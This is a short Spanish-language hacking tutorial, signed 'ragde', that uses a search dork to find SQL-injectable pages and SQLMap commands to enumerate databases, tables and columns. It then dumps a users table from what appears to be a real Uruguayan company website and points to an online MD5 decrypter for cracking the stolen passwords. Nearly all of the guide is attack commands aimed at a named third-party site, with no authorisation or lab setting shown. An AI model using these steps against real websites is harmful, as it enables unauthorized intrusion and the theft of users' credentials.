inurl:categoria.php?id_cat=1
Nos muestra error....
Iremos a nuestro SQLMap
Lo pueden descargar de http://sqlmap.org/
Tambien necesitan descargar e instalar
Primer comando de SQLMap, C:\sql>sqlmap.py -h --- muestra la ayuda del programa ..
Ya que hemos dado una pequeña leída a la ayuda de SQLMap, podremos iniciar a trabajar.
Empezaremos sacando las bases de datos que contenga el sitio, con la sentencia.
C:\sql>sqlmap.py -u http://www.sitio.com.uy/categoria.php?id_cat=1 --dbs
Esta consulta nos arroja lo siguiente...
Nos muestra las bases de datos, que se utilizan en el sitio. Ahora haremos la sentencia para ver las tablas que contiene esta base de datos.
La consulta seria la siguiente.
C:\sql>sqlmap.py -u http://www.sitio.com.uy/categoria.php?id_cat=1 -D canelint_sitios --tables
Nos envia todas las tablas, nos interesa la columna de usuarios asi que, con la siguiente sentencia sacaremos los datos.
C:\sql>sqlmap.py -u http://www.sitio.com.uy/categoria.php?id_cat=1 -D canelint_sitios -T ges_usuarios --columns
Ahora ya tenemos los datos de la tabla, necesitamos hacer un "dump" de la columna,
C:\sql>sqlmap.py -u http://www.canelinteriores.com.uy/categoria.php?id_cat=1 -D canelint_sitios -T ges_usuarios --dump
Ya tenemos todos los datos, que nos interesan. podemos usar
http://www.hashkiller.co.uk/md5-decrypter.aspx para desencriptar los passwords.
Manual hecho por ragde
